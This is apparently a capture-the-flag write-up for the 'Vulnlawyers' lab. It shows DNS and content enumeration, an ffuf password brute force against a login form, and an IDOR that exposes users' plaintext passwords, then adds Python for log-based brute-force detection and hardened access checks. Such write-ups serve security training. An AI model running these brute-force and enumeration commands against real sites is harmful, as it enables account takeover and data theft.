Vulnlawyers
DNS Recon
❯ nslookup -type=any vulnlawyers.co.uk 8.8.8.8
Server: 8.8.8.8
Address: 8.8.8.8#53
Non-authoritative answer:
Name: vulnlawyers.co.uk
Address: 68.183.255.206
vulnlawyers.co.uk nameserver = ns1.digitalocean.com.
vulnlawyers.co.uk nameserver = ns2.digitalocean.com.
vulnlawyers.co.uk nameserver = ns3.digitalocean.com.
vulnlawyers.co.uk
origin = ns1.digitalocean.com
mail addr = hostmaster.vulnlawyers.co.uk
serial = 1626211986
refresh = 10800
retry = 3600
expire = 604800
minimum = 1800
Authoritative answers can be found from:
❯ dnsrecon -d vulnlawyers.co.uk -D ~/Dokumente/ctfchallenge/wordlists/subdomains.txt -t brt
[*] Performing host and subdomain brute force against vulnlawyers.co.uk
[*] A data.vulnlawyers.co.uk 68.183.255.206
[*] A www.vulnlawyers.co.uk 68.183.255.206
[+] 2 Records Found
Content Discovery
❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.2 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnlawyers.co.uk/FUZZ -mc all -fc 404
v1.4.1-dev
________________________________________________
:: Method : GET
:: URL : http://www.vulnlawyers.co.uk/FUZZ
:: Wordlist : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/content.txt
:: Header : Cookie: ctfchallenge=CENSORED
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 1
:: Delay : 0.20 seconds
:: Matcher : Response status: all
:: Filter : Response status: 404
________________________________________________
css [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 29ms]
denied [Status: 401, Size: 1020, Words: 178, Lines: 30, Duration: 30ms]
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 31ms]
js [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 29ms]
login [Status: 302, Size: 1119, Words: 197, Lines: 31, Duration: 38ms]
❯ curl -H "Cookie: ctfchallenge=CENSORED" http://vulnlawyers.co.uk/login
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>VulnLawyers - Old Login</title>
<link href="/css/bootstrap.min.css" rel="stylesheet">
<link href="/template-manager/style.css" rel="stylesheet">
</head>
<body>
<div class="container">
<div class="row">
<div class="col-md-12">
<h1 style="padding-top:100px;text-align: center;color: #060505;letter-spacing: -1px;font-weight: bold">VulnLawyers</h1>
<h3 class="text-center">We'll win that case!</h3>
</div>
</div>
<div class="row">
<div class="col-md-6 col-md-offset-3">
<div class="alert alert-info">
<p>Access to this portal can now be found here <a href=/lawyers-only">/lawyers-only</a></p>
<p>[^FLAG^FB52470E40F47559EBA87252B2D4CF67^FLAG^]</p>
</div>
</div>
</div>
</div>
<script src="/js/jquery.min.js"></script>
<script src="/js/bootstrap.min.js"></script>
</body>
</html>
API Discovery
❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.2 -H "Cookie: ctfchallenge=CENSORED" -u http://data.vulnlawyers.co.uk/FUZZ -mc all -fc 404
v1.4.1-dev
________________________________________________
:: Method : GET
:: URL : http://data.vulnlawyers.co.uk/FUZZ
:: Wordlist : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/content.txt
:: Header : Cookie: ctfchallenge=CENSORED
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 1
:: Delay : 0.20 seconds
:: Matcher : Response status: all
:: Filter : Response status: 404
________________________________________________
campaigns [Status: 429, Size: 169, Words: 7, Lines: 8, Duration: 27ms]
users [Status: 200, Size: 406, Words: 6, Lines: 1, Duration: 29ms]
web.config [Status: 429, Size: 169, Words: 7, Lines: 8, Duration: 26ms]
❯ curl -H "Cookie: ctfchallenge=CENSORED" http://data.vulnlawyers.co.uk/users | jq
{
"users": [
{
"name": "Yusef Mcclain",
"email": "yusef.mcclain@vulnlawyers.co.uk"
},
{
"name": "Shayne Cairns",
"email": "shayne.cairns@vulnlawyers.co.uk"
},
{
"name": "Eisa Evans",
"email": "eisa.evans@vulnlawyers.co.uk"
},
{
"name": "Jaskaran Lowe",
"email": "jaskaran.lowe@vulnlawyers.co.uk"
},
{
"name": "Marsha Blankenship",
"email": "marsha.blankenship@vulnlawyers.co.uk"
}
],
"flag": "[^FLAG^25032EB0D322F7330182507FBAA1A55F^FLAG^]"
}
Bruteforcing
We discovered the login page earlier, during the content discovery phase. Let's check whether we can crack a password using the information gathered from the API.
Let's check the login panel source:
<div class="panel-body">
<form method="post">
<div><label>User Email:</label></div>
<div style="margin-top: 7px"><input class="form-control" name="email" ></div>
<div style="margin-top: 7px"><label>Password:</label></div>
<div><input class="form-control" type="password" name="password" ></div>
<div style="margin-top:7px">
<input type="submit" class="btn btn-success pull-right" value="Login"></div>
Using ffuf we will brute-force the password:
❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/passwords.txt -X POST -d "email=jaskaran.lowe@vulnlawyers.co.uk&password=FUZZ" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnlawyers.co.uk/lawyers-only-login -mc all -fc 200
v1.4.1-dev
________________________________________________
:: Method : POST
:: URL : http://www.vulnlawyers.co.uk/lawyers-only-login
:: Wordlist : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/passwords.txt
:: Header : Cookie: ctfchallenge=CENSORED
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : email=jaskaran.lowe@vulnlawyers.co.uk&password=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 1
:: Delay : 0.10 seconds
:: Matcher : Response status: all
:: Filter : Response status: 200
________________________________________________
123456 [Status: 401, Size: 1925, Words: 554, Lines: 48, Duration: 33ms]
password [Status: 401, Size: 1925, Words: 554, Lines: 48, Duration: 32ms]
summer [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 30ms]
:: Progress: [101/101] :: Job [1/1] :: 7 req/sec :: Duration: [0:00:13] :: Errors: 0 ::
After logging in as jaskaran.lowe@vulnlawyers.co.uk with the password summer we find another flag: [^FLAG^7F1ED1F306FC4E3399CEE15DF4B0AE3C^FLAG^]
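The run above shows the login endpoint answering 101 guesses at 7 req/sec with a 401 each and a 302 on the right one, with no throttling of the kind the data API showed (429). That sequence is easy to pick out of a web server access log. The following Python is an added detection example, not part of the original writeup; the log lines are constructed sample data in combined log format, and the path and status codes are taken from the ffuf output above.

```python
import re
from collections import defaultdict

# Combined-log-format line; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def log_line(ip, ts, status, size, path="/lawyers-only-login"):
    """Build one constructed access-log line (sample data, not from the page)."""
    return f'{ip} - - [{ts}] "POST {path} HTTP/1.1" {status} {size}'

# Constructed sample: one client fails 100 times and then gets a 302, mirroring
# the ffuf run above; a second client logs in normally on the first attempt.
SAMPLE_LINES = (
    [log_line("10.0.0.5", f"14/Jul/2021:10:00:{i % 60:02d} +0000", 401, 1925) for i in range(100)]
    + [log_line("10.0.0.5", "14/Jul/2021:10:01:41 +0000", 302, 0)]
    + [log_line("10.0.0.9", "14/Jul/2021:10:05:00 +0000", 302, 0)]
)

def detect_login_bruteforce(lines, path="/lawyers-only-login", threshold=10):
    """Return {ip: {"failures": n, "success_after_failures": bool}} for every
    client whose POSTs to the login path failed more than `threshold` times.
    A 2xx/302 following a run of 401s from the same client is the signature
    of a successful guess and should be treated as a compromised account."""
    failures = defaultdict(int)
    success = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != path:
            continue
        ip, status = m["ip"], int(m["status"])
        if status == 401:
            failures[ip] += 1
        elif status in (200, 302) and failures.get(ip, 0) > 0:
            success[ip] = True
    return {
        ip: {"failures": n, "success_after_failures": success.get(ip, False)}
        for ip, n in failures.items() if n > threshold
    }

if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(SAMPLE_LINES).items():
        print(ip, info)
```

In production the same logic should be keyed on the submitted email as well as the client IP, since a distributed attacker rotates addresses but not the target account.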
IDOR
{"id":4,"name":"Jaskaran Lowe","email":"jaskaran.lowe@vulnlawyers.co.uk","password":"summer"}
{"id":1,"name":"Yusef Mcclain","email":"yusef.mcclain@vulnlawyers.co.uk","password":"Rk@c7#U3@2r%0f"}
{"id":2,"name":"Shayne Cairns","email":"shayne.cairns@vulnlawyers.co.uk","password":"q2V944a1^3p","flag":"[^FLAG^938F5DC109A1E9B4FF3E3E92D29A56B3^FLAG^]"}
{"id":3,"name":"Eisa Evans","email":"eisa.evans@vulnlawyers.co.uk","password":"Sn06#ibx@lGPG7"}
{"id":5,"name":"Marsha Blankenship","email":"marsha.blankenship@vulnlawyers.co.uk","password":"A^66vqhOU!e2ZV"}
Final Flag
Logged in as Shayne Cairns we seem to have permission to delete cases. Let's examine this. After clicking on "delete case" we get the final flag [^FLAG^B38BAE0B8B804FCB85C730F10B3B5CB5^FLAG^]
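The IDOR records above are served by a numeric id with no ownership check, and the stored plaintext password is part of every response; the case-deletion action is the same class of bug, with authorisation decided by which button the client sees. The following Python is an added example, not the challenge's code: an in-memory version of both handlers with a server-side ownership/role check and salted, hashed credentials that are never serialised. The names and emails are those the page lists; the roles, placeholder passwords, the case record and the Forbidden exception are assumptions.

```python
import hashlib
import os
from dataclasses import dataclass, field

class Forbidden(Exception):
    """Raised when the session user is not allowed to perform the action."""

@dataclass
class User:
    id: int
    name: str
    email: str
    role: str                              # assumed: "lawyer" or "partner"
    pw_hash: bytes = field(repr=False)     # salt + PBKDF2 digest, never the plaintext

def hash_password(plaintext: str, salt: bytes = None) -> bytes:
    salt = salt or os.urandom(16)
    return salt + hashlib.pbkdf2_hmac("sha256", plaintext.encode(), salt, 200_000)

# Constructed records modelled on the page's user listing; passwords are placeholders.
USERS = {u.id: u for u in [
    User(1, "Yusef Mcclain", "yusef.mcclain@vulnlawyers.co.uk", "lawyer", hash_password("placeholder-1")),
    User(2, "Shayne Cairns", "shayne.cairns@vulnlawyers.co.uk", "partner", hash_password("placeholder-2")),
    User(4, "Jaskaran Lowe", "jaskaran.lowe@vulnlawyers.co.uk", "lawyer", hash_password("placeholder-4")),
]}
CASES = {101: {"owner_id": 4, "title": "constructed case"}}

def vulnerable_profile(record_id: int, session_user: User) -> dict:
    """The pattern the page exploits: the id comes from the client, is looked up
    with no ownership check, and the whole stored record (credential field
    included) is serialised back to the caller."""
    return vars(USERS[record_id])

def profile(record_id: int, session_user: User) -> dict:
    """Hardened: only the record owner (or a partner) may read it, and the
    response is an explicit allow-list of fields with no credential material."""
    if record_id != session_user.id and session_user.role != "partner":
        raise Forbidden(f"user {session_user.id} may not read record {record_id}")
    u = USERS[record_id]
    return {"id": u.id, "name": u.name, "email": u.email}

def delete_case(case_id: int, session_user: User) -> bool:
    """Destructive action gated on role server-side, not on whether a button is shown."""
    if session_user.role != "partner":
        raise Forbidden(f"user {session_user.id} may not delete cases")
    return CASES.pop(case_id, None) is not None
```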